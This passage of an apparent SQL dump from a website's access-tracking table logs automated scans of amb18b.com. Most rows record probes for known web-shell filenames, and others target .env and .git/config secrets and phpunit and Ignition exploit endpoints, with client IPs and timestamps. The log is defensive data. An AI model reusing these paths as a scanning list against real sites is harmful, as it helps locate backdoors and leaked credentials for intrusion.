Access',1,'2025-11-16 23:22:29','2025-11-16 23:22:29'),(7451,'https://amb18b.com/fe5.php','52.138.205.19','Direct Access',2,'2025-11-16 23:23:11','2025-11-16 23:22:31'),(7452,'https://amb18b.com/about.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:32','2025-11-16 23:22:32'),(7453,'https://amb18b.com/class.1.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:34','2025-11-16 23:22:34'),(7454,'https://amb18b.com/bless.php/mail.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:36','2025-11-16 23:22:36'),(7455,'https://amb18b.com/mail.php','52.138.205.19','Direct Access',2,'2025-11-16 23:24:31','2025-11-16 23:22:37'),(7456,'https://amb18b.com/system_log.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:39','2025-11-16 23:22:39'),(7457,'https://amb18b.com/gecko-litespeed.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:41','2025-11-16 23:22:41'),(7458,'https://amb18b.com/file21.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:42','2025-11-16 23:22:42'),(7459,'https://amb18b.com/en0.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:44','2025-11-16 23:22:44'),(7460,'https://amb18b.com/nfile.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:48','2025-11-16 23:22:48'),(7461,'https://amb18b.com/ioxi-o.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:51','2025-11-16 23:22:51'),(7462,'https://amb18b.com/fm.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:53','2025-11-16 23:22:53'),(7463,'https://amb18b.com/chosen.php','52.138.205.19','Direct Access',2,'2025-11-16 23:23:29','2025-11-16 23:22:54'),(7464,'https://amb18b.com/f6.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:56','2025-11-16 23:22:56'),(7465,'https://amb18b.com/shellalfa.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:58','2025-11-16 23:22:58'),(7466,'https://amb18b.com/redi.php','52.138.205.19','Direct Access',1,'2025-11-16 23:22:59','2025-11-16 23:22:59'),(7467,'https://amb18b.com/s.php','52.138.205.19','Direct Access',3,'2025-11-16 23:23:47','2025-11-16 23:23:01'),(7468,'https://amb18b.com/size.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:04','2025-11-16 23:23:04'),(7469,'https://amb18b.com/gifclass.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:09','2025-11-16 23:23:09'),(7470,'https://amb18b.com/miso.php','52.138.205.19','Direct Access',2,'2025-11-16 23:24:12','2025-11-16 23:23:13'),(7471,'https://amb18b.com/0x.php','52.138.205.19','Direct Access',2,'2025-11-16 23:24:01','2025-11-16 23:23:15'),(7472,'https://amb18b.com/we.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:16','2025-11-16 23:23:16'),(7473,'https://amb18b.com/ar.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:19','2025-11-16 23:23:19'),(7474,'https://amb18b.com/css.php','52.138.205.19','Direct Access',2,'2025-11-16 23:23:36','2025-11-16 23:23:20'),(7475,'https://amb18b.com/lock360.php','52.138.205.19','Direct Access',2,'2025-11-16 23:23:31','2025-11-16 23:23:22'),(7476,'https://amb18b.com/bolt.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:24','2025-11-16 23:23:24'),(7477,'https://amb18b.com/ton.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:27','2025-11-16 23:23:27'),(7478,'https://amb18b.com/vee.php','52.138.205.19','Direct Access',2,'2025-11-16 23:24:21','2025-11-16 23:23:32'),(7479,'https://amb18b.com/mpxct.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:34','2025-11-16 23:23:34'),(7480,'https://amb18b.com/file7.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:37','2025-11-16 23:23:37'),(7481,'https://amb18b.com/gm.php','52.138.205.19','Direct Access',2,'2025-11-16 23:23:44','2025-11-16 23:23:39'),(7482,'https://amb18b.com/wp-freya.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:41','2025-11-16 23:23:41'),(7483,'https://amb18b.com/7.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:42','2025-11-16 23:23:42'),(7484,'https://amb18b.com/cfile.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:46','2025-11-16 23:23:46'),(7485,'https://amb18b.com/wpo.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:49','2025-11-16 23:23:49'),(7486,'https://amb18b.com/owl.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:51','2025-11-16 23:23:51'),(7487,'https://amb18b.com/tgrs.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:52','2025-11-16 23:23:52'),(7488,'https://amb18b.com/ut.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:54','2025-11-16 23:23:54'),(7489,'https://amb18b.com/a3.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:56','2025-11-16 23:23:56'),(7490,'https://amb18b.com/aa.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:57','2025-11-16 23:23:57'),(7491,'https://amb18b.com/3.php','52.138.205.19','Direct Access',1,'2025-11-16 23:23:59','2025-11-16 23:23:59'),(7492,'https://amb18b.com/goat.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:02','2025-11-16 23:24:02'),(7493,'https://amb18b.com/123.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:04','2025-11-16 23:24:04'),(7494,'https://amb18b.com/enclas.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:06','2025-11-16 23:24:06'),(7495,'https://amb18b.com/rrr.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:07','2025-11-16 23:24:07'),(7496,'https://amb18b.com/usep.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:09','2025-11-16 23:24:09'),(7497,'https://amb18b.com/aghbvr.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:11','2025-11-16 23:24:11'),(7498,'https://amb18b.com/naxc.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:14','2025-11-16 23:24:14'),(7499,'https://amb18b.com/fex.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:16','2025-11-16 23:24:16'),(7500,'https://amb18b.com/doti.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:18','2025-11-16 23:24:18'),(7501,'https://amb18b.com/kaza.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:19','2025-11-16 23:24:19'),(7502,'https://amb18b.com/geck.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:23','2025-11-16 23:24:23'),(7503,'https://amb18b.com/xsox.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:24','2025-11-16 23:24:24'),(7504,'https://amb18b.com/1.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:26','2025-11-16 23:24:26'),(7505,'https://amb18b.com/bak.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:28','2025-11-16 23:24:28'),(7506,'https://amb18b.com/ini.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:29','2025-11-16 23:24:29'),(7507,'https://amb18b.com/pent.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:33','2025-11-16 23:24:33'),(7508,'https://amb18b.com/asgtt.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:34','2025-11-16 23:24:34'),(7509,'https://amb18b.com/av.php.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:36','2025-11-16 23:24:36'),(7510,'https://amb18b.com/pn.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:38','2025-11-16 23:24:38'),(7511,'https://amb18b.com/sx.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:40','2025-11-16 23:24:40'),(7512,'https://amb18b.com/bless.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:41','2025-11-16 23:24:41'),(7513,'https://amb18b.com/xsas.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:43','2025-11-16 23:24:43'),(7514,'https://amb18b.com/blox.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:45','2025-11-16 23:24:45'),(7515,'https://amb18b.com/pp.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:46','2025-11-16 23:24:46'),(7516,'https://amb18b.com/gool.php','52.138.205.19','Direct Access',1,'2025-11-16 23:24:48','2025-11-16 23:24:48'),(7517,'https://amb18b.com/.git/config','68.183.51.160','Direct Access',1,'2025-11-17 00:15:41','2025-11-17 00:15:41'),(7518,'https://amb18b.com/.git/config','68.183.51.160','Direct Access',1,'2025-11-17 00:15:43','2025-11-17 00:15:43'),(7519,'https://amb18b.com/1.php','68.150.40.125','https://duckduckgo.com/',1,'2025-11-17 01:56:59','2025-11-17 01:56:59'),(7520,'https://amb18b.com/aa.php','131.173.239.11','https://www.bing.com/',1,'2025-11-17 01:57:02','2025-11-17 01:57:02'),(7521,'https://amb18b.com/about.php','213.200.98.133','https://www.google.fr/',1,'2025-11-17 01:57:03','2025-11-17 01:57:03'),(7522,'https://amb18b.com/admin.php','97.36.202.12','https://www.bing.com/',1,'2025-11-17 01:57:05','2025-11-17 01:57:05'),(7523,'https://amb18b.com/admin.php?p=','193.81.64.231','https://duckduckgo.com/',1,'2025-11-17 01:57:06','2025-11-17 01:57:06'),(7524,'https://amb18b.com/akc.php?p=','79.100.71.219','https://www.google.co.uk/',1,'2025-11-17 01:57:08','2025-11-17 01:57:08'),(7525,'https://amb18b.com/app/webroot/filemanager.php?p=','112.153.193.165','https://www.google.com/',1,'2025-11-17 01:57:09','2025-11-17 01:57:09'),(7526,'https://amb18b.com/asasx.php?p=','144.100.170.177','https://duckduckgo.com/',1,'2025-11-17 01:57:11','2025-11-17 01:57:11'),(7527,'https://amb18b.com/atomlib.php','3.84.191.46','https://www.google.fr/',1,'2025-11-17 01:57:12','2025-11-17 01:57:12'),(7528,'https://amb18b.com/autoload_classmap.php','208.90.219.100','https://www.google.de/',1,'2025-11-17 01:57:14','2025-11-17 01:57:14'),(7529,'https://amb18b.com/buy.php','204.91.168.155','https://duckduckgo.com/',1,'2025-11-17 01:57:15','2025-11-17 01:57:15'),(7530,'https://amb18b.com/chosen.php?p=','2.162.250.34','https://www.bing.com/',1,'2025-11-17 01:57:17','2025-11-17 01:57:17'),(7531,'https://amb18b.com/classwithtostring.php','211.86.6.0','https://www.google.de/',1,'2025-11-17 01:57:18','2025-11-17 01:57:18'),(7532,'https://amb18b.com/cong.php','166.245.23.70','https://www.google.de/',1,'2025-11-17 01:57:20','2025-11-17 01:57:20'),(7533,'https://amb18b.com/default.php','146.46.58.219','https://www.yahoo.com/',1,'2025-11-17 01:57:21','2025-11-17 01:57:21'),(7534,'https://amb18b.com/dropdown.php?p=','65.108.217.74','https://www.google.de/',1,'2025-11-17 01:57:23','2025-11-17 01:57:23'),(7535,'https://amb18b.com/edit.php','14.43.64.85','https://www.bing.com/',1,'2025-11-17 01:57:24','2025-11-17 01:57:24'),(7536,'https://amb18b.com/filemanager/dialog.php','6.134.233.84','https://www.yahoo.com/',1,'2025-11-17 01:57:26','2025-11-17 01:57:26'),(7537,'https://amb18b.com/ioxi-o.php','114.239.34.227','https://www.google.com/',1,'2025-11-17 01:57:27','2025-11-17 01:57:27'),(7538,'https://amb18b.com/item.php','26.225.134.86','https://www.google.de/',1,'2025-11-17 01:57:29','2025-11-17 01:57:29'),(7539,'https://amb18b.com/makeasmtp.php?p=','59.192.201.55','https://www.bing.com/',1,'2025-11-17 01:57:30','2025-11-17 01:57:30'),(7540,'https://amb18b.com/new.php','24.129.141.215','https://www.google.fr/',1,'2025-11-17 01:57:32','2025-11-17 01:57:32'),(7541,'https://amb18b.com/abcd.php','151.49.152.0','https://www.google.com/',1,'2025-11-17 01:57:35','2025-11-17 01:57:35'),(7542,'https://amb18b.com/ds.php','215.144.56.27','https://www.google.de/',1,'2025-11-17 01:57:36','2025-11-17 01:57:36'),(7543,'https://amb18b.com/alfa.php','189.229.123.44','https://www.google.co.uk/',1,'2025-11-17 01:57:38','2025-11-17 01:57:38'),(7544,'https://amb18b.com/hplfuns.php','9.189.102.208','https://duckduckgo.com/',1,'2025-11-17 01:57:39','2025-11-17 01:57:39'),(7545,'https://amb18b.com/file.php','202.109.62.136','https://duckduckgo.com/',1,'2025-11-17 01:57:41','2025-11-17 01:57:41'),(7546,'https://amb18b.com/adminfuns.php','28.183.18.252','https://www.google.com/',1,'2025-11-17 01:57:42','2025-11-17 01:57:42'),(7547,'https://amb18b.com/wp-admin/css/colors/blue/index.php','82.237.179.42','https://www.google.de/',1,'2025-11-17 01:57:44','2025-11-17 01:57:44'),(7548,'https://amb18b.com/moon.php','43.136.185.240','https://www.bing.com/',1,'2025-11-17 01:57:47','2025-11-17 01:57:47'),(7549,'https://amb18b.com/wp-admin/includes/','92.199.226.71','https://www.google.co.uk/',1,'2025-11-17 01:57:48','2025-11-17 01:57:48'),(7550,'https://amb18b.com/goods.php','42.193.70.92','https://www.google.com/',1,'2025-11-17 01:57:50','2025-11-17 01:57:50'),(7551,'https://amb18b.com/wp-good.php','36.106.225.200','https://www.google.fr/',1,'2025-11-17 01:57:53','2025-11-17 01:57:53'),(7552,'https://amb18b.com/xmrlpc.php','59.24.47.130','https://www.bing.com/',1,'2025-11-17 01:57:54','2025-11-17 01:57:54'),(7553,'https://amb18b.com/info.php','149.111.75.139','https://www.google.fr/',1,'2025-11-17 01:57:56','2025-11-17 01:57:56'),(7554,'https://amb18b.com/error.php','172.190.142.176','Direct Access',1,'2025-11-17 04:06:47','2025-11-17 04:06:47'),(7555,'https://amb18b.com/x.php','172.190.142.176','Direct Access',1,'2025-11-17 04:06:50','2025-11-17 04:06:50'),(7556,'https://amb18b.com/xx.php','172.190.142.176','Direct Access',1,'2025-11-17 04:06:51','2025-11-17 04:06:51'),(7557,'https://amb18b.com/222.php','172.190.142.176','Direct Access',1,'2025-11-17 04:06:54','2025-11-17 04:06:54'),(7558,'https://amb18b.com/444.php','172.190.142.176','Direct Access',1,'2025-11-17 04:06:55','2025-11-17 04:06:55'),(7559,'https://amb18b.com/file9.php','172.190.142.176','Direct Access',1,'2025-11-17 04:06:57','2025-11-17 04:06:57'),(7560,'https://amb18b.com/filesss.php','172.190.142.176','Direct Access',2,'2025-11-17 04:09:11','2025-11-17 04:06:59'),(7561,'https://amb18b.com/file88.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:01','2025-11-17 04:07:01'),(7562,'https://amb18b.com/gifclass4.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:02','2025-11-17 04:07:02'),(7563,'https://amb18b.com/class19.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:04','2025-11-17 04:07:04'),(7564,'https://amb18b.com/2clas.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:06','2025-11-17 04:07:06'),(7565,'https://amb18b.com/bless5.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:08','2025-11-17 04:07:08'),(7566,'https://amb18b.com/file15.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:10','2025-11-17 04:07:10'),(7567,'https://amb18b.com/333.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:11','2025-11-17 04:07:11'),(7568,'https://amb18b.com/alpa.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:13','2025-11-17 04:07:13'),(7569,'https://amb18b.com/file21.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:15','2025-11-17 04:07:15'),(7570,'https://amb18b.com/ut.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:17','2025-11-17 04:07:17'),(7571,'https://amb18b.com/inde.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:18','2025-11-17 04:07:18'),(7572,'https://amb18b.com/classgoto24.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:20','2025-11-17 04:07:20'),(7573,'https://amb18b.com/thh.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:22','2025-11-17 04:07:22'),(7574,'https://amb18b.com/fffff.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:24','2025-11-17 04:07:24'),(7575,'https://amb18b.com/indo.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:25','2025-11-17 04:07:25'),(7576,'https://amb18b.com/fileas.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:27','2025-11-17 04:07:27'),(7577,'https://amb18b.com/yellow.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:29','2025-11-17 04:07:29'),(7578,'https://amb18b.com/wfile.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:31','2025-11-17 04:07:31'),(7579,'https://amb18b.com/class20.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:32','2025-11-17 04:07:32'),(7580,'https://amb18b.com/build.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:34','2025-11-17 04:07:34'),(7581,'https://amb18b.com/1.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:36','2025-11-17 04:07:36'),(7582,'https://amb18b.com/usep.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:38','2025-11-17 04:07:38'),(7583,'https://amb18b.com/wa.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:39','2025-11-17 04:07:39'),(7584,'https://amb18b.com/wb.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:41','2025-11-17 04:07:41'),(7585,'https://amb18b.com/file1.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:43','2025-11-17 04:07:43'),(7586,'https://amb18b.com/gmo.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:45','2025-11-17 04:07:45'),(7587,'https://amb18b.com/info.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:47','2025-11-17 04:07:47'),(7588,'https://amb18b.com/file2.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:48','2025-11-17 04:07:48'),(7589,'https://amb18b.com/lv.php','172.190.142.176','Direct Access',2,'2025-11-17 04:09:27','2025-11-17 04:07:50'),(7590,'https://amb18b.com/about.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:52','2025-11-17 04:07:52'),(7591,'https://amb18b.com/abcd.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:53','2025-11-17 04:07:53'),(7592,'https://amb18b.com/lock360.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:55','2025-11-17 04:07:55'),(7593,'https://amb18b.com/pp.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:57','2025-11-17 04:07:57'),(7594,'https://amb18b.com/geck.php','172.190.142.176','Direct Access',1,'2025-11-17 04:07:59','2025-11-17 04:07:59'),(7595,'https://amb18b.com/gm.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:01','2025-11-17 04:08:01'),(7596,'https://amb18b.com/file4.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:03','2025-11-17 04:08:03'),(7597,'https://amb18b.com/520.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:05','2025-11-17 04:08:05'),(7598,'https://amb18b.com/file18.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:06','2025-11-17 04:08:06'),(7599,'https://amb18b.com/ffile.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:08','2025-11-17 04:08:08'),(7600,'https://amb18b.com/file7.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:10','2025-11-17 04:08:10'),(7601,'https://amb18b.com/aaa.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:12','2025-11-17 04:08:12'),(7602,'https://amb18b.com/vee.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:14','2025-11-17 04:08:14'),(7603,'https://amb18b.com/efile.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:16','2025-11-17 04:08:16'),(7604,'https://amb18b.com/afile.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:17','2025-11-17 04:08:17'),(7605,'https://amb18b.com/f35.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:19','2025-11-17 04:08:19'),(7606,'https://amb18b.com/goods.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:21','2025-11-17 04:08:21'),(7607,'https://amb18b.com/enclas.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:23','2025-11-17 04:08:23'),(7608,'https://amb18b.com/ioxi-o.php','172.190.142.176','Direct Access',2,'2025-11-17 04:09:17','2025-11-17 04:08:25'),(7609,'https://amb18b.com/wp-admin/js/wp-conflg.php?p=','172.190.142.176','Direct Access',1,'2025-11-17 04:08:27','2025-11-17 04:08:27'),(7610,'https://amb18b.com/classwithtostring.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:29','2025-11-17 04:08:29'),(7611,'https://amb18b.com/image.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:30','2025-11-17 04:08:30'),(7612,'https://amb18b.com/wp-admin/wp-conflg.php?p=','172.190.142.176','Direct Access',1,'2025-11-17 04:08:32','2025-11-17 04:08:32'),(7613,'https://amb18b.com/wp-freya.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:34','2025-11-17 04:08:34'),(7614,'https://amb18b.com/X7x.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:36','2025-11-17 04:08:36'),(7615,'https://amb18b.com/admir.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:38','2025-11-17 04:08:38'),(7616,'https://amb18b.com/file52.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:39','2025-11-17 04:08:39'),(7617,'https://amb18b.com/zde.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:41','2025-11-17 04:08:41'),(7618,'https://amb18b.com/wpo.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:43','2025-11-17 04:08:43'),(7619,'https://amb18b.com/aj.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:45','2025-11-17 04:08:45'),(7620,'https://amb18b.com/opts.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:46','2025-11-17 04:08:46'),(7621,'https://amb18b.com/filer.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:48','2025-11-17 04:08:48'),(7622,'https://amb18b.com/lites.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:50','2025-11-17 04:08:50'),(7623,'https://amb18b.com/0x.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:52','2025-11-17 04:08:52'),(7624,'https://amb18b.com/bless3.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:54','2025-11-17 04:08:54'),(7625,'https://amb18b.com/wsd.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:55','2025-11-17 04:08:55'),(7626,'https://amb18b.com/f6.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:57','2025-11-17 04:08:57'),(7627,'https://amb18b.com/he.php','172.190.142.176','Direct Access',1,'2025-11-17 04:08:59','2025-11-17 04:08:59'),(7628,'https://amb18b.com/aves.php','172.190.142.176','Direct Access',1,'2025-11-17 04:09:01','2025-11-17 04:09:01'),(7629,'https://amb18b.com/.well-known/acme-challenge/about.php','172.190.142.176','Direct Access',1,'2025-11-17 04:09:02','2025-11-17 04:09:02'),(7630,'https://amb18b.com/gorila.php','172.190.142.176','Direct Access',1,'2025-11-17 04:09:04','2025-11-17 04:09:04'),(7631,'https://amb18b.com/vanta.php','172.190.142.176','Direct Access',1,'2025-11-17 04:09:06','2025-11-17 04:09:06'),(7632,'https://amb18b.com/sh3ll.php','172.190.142.176','Direct Access',1,'2025-11-17 04:09:08','2025-11-17 04:09:08'),(7633,'https://amb18b.com/cabs.php','172.190.142.176','Direct Access',1,'2025-11-17 04:09:09','2025-11-17 04:09:09'),(7634,'https://amb18b.com/wp-aaa.php','172.190.142.176','Direct Access',1,'2025-11-17 04:09:13','2025-11-17 04:09:13'),(7635,'https://amb18b.com/css.php','172.190.142.176','Direct Access',1,'2025-11-17 04:09:15','2025-11-17 04:09:15'),(7636,'https://amb18b.com/classwithtostring.php?p=','172.190.142.176','Direct Access',1,'2025-11-17 04:09:18','2025-11-17 04:09:18'),(7637,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/filemanager.php','172.190.142.176','Direct Access',1,'2025-11-17 04:09:20','2025-11-17 04:09:20'),(7638,'https://amb18b.com/fm.php','172.190.142.176','Direct Access',1,'2025-11-17 04:09:22','2025-11-17 04:09:22'),(7639,'https://amb18b.com/403.php','172.190.142.176','Direct Access',1,'2025-11-17 04:09:23','2025-11-17 04:09:23'),(7640,'https://amb18b.com/admin.php','172.190.142.176','Direct Access',1,'2025-11-17 04:09:25','2025-11-17 04:09:25'),(7641,'https://amb18b.com/.env','45.139.104.183','Direct Access',1,'2025-11-17 05:46:26','2025-11-17 05:46:26'),(7642,'https://amb18b.com/wp-admin/css/','217.76.49.137','Invalid Referrer',1,'2025-11-17 08:15:24','2025-11-17 08:15:24'),(7643,'https://amb18b.com/.env','2a14:7c1::2','Direct Access',1,'2025-11-17 09:17:24','2025-11-17 09:17:24'),(7644,'https://amb18b.com/?p=29','49.51.243.156','Direct Access',1,'2025-11-17 09:39:34','2025-11-17 09:39:34'),(7645,'https://amb18b.com/new/','34.145.141.116','Direct Access',1,'2025-11-17 17:20:45','2025-11-17 17:20:45'),(7646,'https://amb18b.com/wp/','34.145.141.116','Direct Access',1,'2025-11-17 17:20:46','2025-11-17 17:20:46'),(7647,'https://amb18b.com/old/','34.145.141.116','Direct Access',1,'2025-11-17 17:20:47','2025-11-17 17:20:47'),(7648,'https://amb18b.com/blog/','34.145.141.116','Direct Access',1,'2025-11-17 17:20:49','2025-11-17 17:20:49'),(7649,'https://amb18b.com/backup/','34.145.141.116','Direct Access',1,'2025-11-17 17:20:50','2025-11-17 17:20:50'),(7650,'https://amb18b.com/wordpress/','34.145.141.116','Direct Access',1,'2025-11-17 17:20:51','2025-11-17 17:20:51'),(7651,'https://amb18b.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','165.22.223.237','Direct Access',1,'2025-11-17 18:18:49','2025-11-17 18:18:49'),(7652,'https://amb18b.com/_ignition/execute-solution','165.22.223.237','Direct Access',1,'2025-11-17 18:19:07','2025-11-17 18:19:07'),(7653,'https://amb18b.com/public/_ignition/execute-solution','165.22.223.237','Direct Access',1,'2025-11-17 18:19:20','2025-11-17 18:19:20'),(7654,'https://amb18b.com/wp-includes/postnews.php','45.95.42.80','Invalid Referrer',1,'2025-11-17 18:43:55','2025-11-17 18:43:55'),(7655,'https://amb18b.com/wp-includes/postnews.php','45.95.42.80','Invalid Referrer',1,'2025-11-17 18:43:59','2025-11-17 18:43:59'),(7656,'https://amb18b.com/wp-admin/postnews.php','45.95.42.80','Invalid Referrer',2,'2025-11-17 18:44:08','2025-11-17 18:44:06'),(7657,'https://amb18b.com/abcd.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:38','2025-11-17 20:39:38'),(7658,'https://amb18b.com/file17.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:39','2025-11-17 20:39:39'),(7659,'https://amb18b.com/goods.php','130.33.77.13','Direct Access',2,'2025-11-17 20:43:48','2025-11-17 20:39:41'),(7660,'https://amb18b.com/blue.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:42','2025-11-17 20:39:42'),(7661,'https://amb18b.com/num.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:43','2025-11-17 20:39:43'),(7662,'https://amb18b.com/rh.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:44','2025-11-17 20:39:44'),(7663,'https://amb18b.com/222.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:46','2025-11-17 20:39:46'),(7664,'https://amb18b.com/sh.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:47','2025-11-17 20:39:47'),(7665,'https://amb18b.com/css.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:48','2025-11-17 20:39:48'),(7666,'https://amb18b.com/thai.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:49','2025-11-17 20:39:49'),(7667,'https://amb18b.com/filei.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:51','2025-11-17 20:39:51'),(7668,'https://amb18b.com/v2.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:53','2025-11-17 20:39:53'),(7669,'https://amb18b.com/3.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:55','2025-11-17 20:39:55'),(7670,'https://amb18b.com/10.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:56','2025-11-17 20:39:56'),(7671,'https://amb18b.com/.well-known/info.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:57','2025-11-17 20:39:57'),(7672,'https://amb18b.com/ee.php','130.33.77.13','Direct Access',1,'2025-11-17 20:39:59','2025-11-17 20:39:59'),(7673,'https://amb18b.com/rsnu.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:00','2025-11-17 20:40:00'),(7674,'https://amb18b.com/x4.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:01','2025-11-17 20:40:01'),(7675,'https://amb18b.com/kk.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:04','2025-11-17 20:40:04'),(7676,'https://amb18b.com/bless3.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:06','2025-11-17 20:40:06'),(7677,'https://amb18b.com/456.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:08','2025-11-17 20:40:08'),(7678,'https://amb18b.com/z.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:09','2025-11-17 20:40:09'),(7679,'https://amb18b.com/Sanskrit.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:10','2025-11-17 20:40:10'),(7680,'https://amb18b.com/naxc.php','130.33.77.13','Direct Access',1,'2025-11-17 20:40:11','2025-11-17 